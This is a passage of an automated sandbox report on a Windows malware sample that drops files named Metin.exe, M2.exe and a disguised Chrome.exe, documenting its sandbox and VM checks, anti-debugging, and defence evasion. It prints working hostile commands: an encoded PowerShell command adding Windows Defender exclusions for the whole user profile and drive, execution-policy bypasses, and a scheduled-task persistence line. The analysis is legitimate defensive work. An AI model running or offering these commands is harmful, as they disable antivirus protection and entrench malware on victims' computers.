                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Metin.exe, 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, Metin.exe.1.dr, Chrome.exe.9.drBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\AppData\Roaming\M2.exeMemory allocated: 2420000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeMemory allocated: 2420000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeMemory allocated: 10C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeMemory allocated: 1AC00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeMemory allocated: 960000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeMemory allocated: 1A680000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeMemory allocated: 2C90000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeMemory allocated: 1AF10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeMemory allocated: 2E30000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeMemory allocated: 1B0C0000 memory reserve | memory write watch
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6275Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3304Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWindow / User API: threadDelayed 8744Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWindow / User API: threadDelayed 1063Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4942Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4895Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7078
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2485
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7876
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1752
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6797
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2809
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exe TID: 8100Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exe TID: 1704Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3104Thread sleep count: 7876 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128Thread sleep count: 1752 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 796Thread sleep count: 6797 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep count: 2809 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe TID: 6568Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe TID: 7164Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Chrome.exe TID: 5276Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Metin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeThread delayed: delay time: 922337203685477
                        Source: Chrome.exe.9.drBinary or memory string: vmware
                        Source: M2.exe, 00000006.00000002.2530123513.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2552335179.000000001B9D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Users\user\AppData\Roaming\Metin.exeCode function: 9_2_00007FF7C1417585 CheckRemoteDebuggerPresent,9_2_00007FF7C1417585
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\M2.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeCode function: 1_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,1_2_004014D1
                        Source: C:\Users\user\AppData\Roaming\M2.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'Jump to behavior
                        Bypasses PowerShell execution policy
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'
                        Encrypted powershell cmdline option found
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: Base64 decoded <#wcw#>Add-MpPreference <#mbb#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hbv#> -Force <#xzz#>
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: Base64 decoded <#wcw#>Add-MpPreference <#mbb#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hbv#> -Force <#xzz#>Jump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="Jump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Users\user\AppData\Roaming\M2.exe "C:\Users\user\AppData\Roaming\M2.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Users\user\AppData\Roaming\Metin.exe "C:\Users\user\AppData\Roaming\Metin.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajahcaywb3acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajag0aygbiacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajaggaygb2acmapgagac0argbvahiaywblacaapaajahgaegb6acmapga="
                        Source: C:\Users\user\Desktop\f5ATZ1i5CU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajahcaywb3acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajag0aygbiacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajaggaygb2acmapgagac0argbvahiaywblacaapaajahgaegb6acmapga="Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
